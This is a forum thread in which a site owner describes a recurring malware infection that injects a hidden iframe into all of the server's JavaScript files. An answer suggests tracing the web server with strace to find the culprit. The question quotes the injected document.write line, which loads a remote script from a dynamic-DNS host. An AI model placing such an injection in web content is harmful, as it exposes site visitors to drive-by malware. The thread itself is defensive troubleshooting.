0

Possible Duplicate:
My server’s been hacked EMERGENCY

A server of mine recently suffered a malware attack. I've since cleaned the server up a bit, upgraded a variety of wordpress installs and timthumb files, and removed a lot of old and archived directories. My host (dreamhost) agrees that all the big wide open gaping vulnerabilities are closed.

Now I just need to find the source of the malware. Somewhere on my server, a script is adding an iframe injection to all my javascript files. It happens every few minutes. Here's an example of the injection, though this changes sometimes:

document.write('<iframe src="http://wbjsb.myddns.com/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');

If I remove this, it comes back in about 5 minutes.

Any thoughts on how to hunt down the script that is making these changes? Thanks!

Community
  • 1
PJ.
  • 213
  • 1
  • 4
  • 10

1 Answers1

0

If the malware is a script that is actually being executed by the web server, you could attempt to use strace to see what files are being opened and/or written to by the web server process/script interpreter based on system calls being made. It's a little low-level, but it works. (This depends on the server, scripting language, and forking model being used). You'd probably want to stick strace on the script interpreter (using php as an example, e.g. php5-fpm if it's PHP FPM, apache2 if using mod_php5) and could see what files are being opened, e.g. for apache2 with mod_php5:

sudo strace -f -e open,close,read,write apache2 -k start | tee /tmp/strace.log

or something to that effect, and examine the log. (-f forces strace to follow forks assuming your Apache is using the prefork MPM; generally the default for mod_php5 installs, -e open restricts output to only the open(2) syscall and friends). Obviously, this is going to show you every file that the server/PHP is opening, but you can do some grep magic to try and narrow it down.

You could probably narrow down based on the write(2) syscall that is occurring as well with grep (use the -v option to strace to avoid truncating the strings that are getting sent to write(2)).

blackbox222
  • 101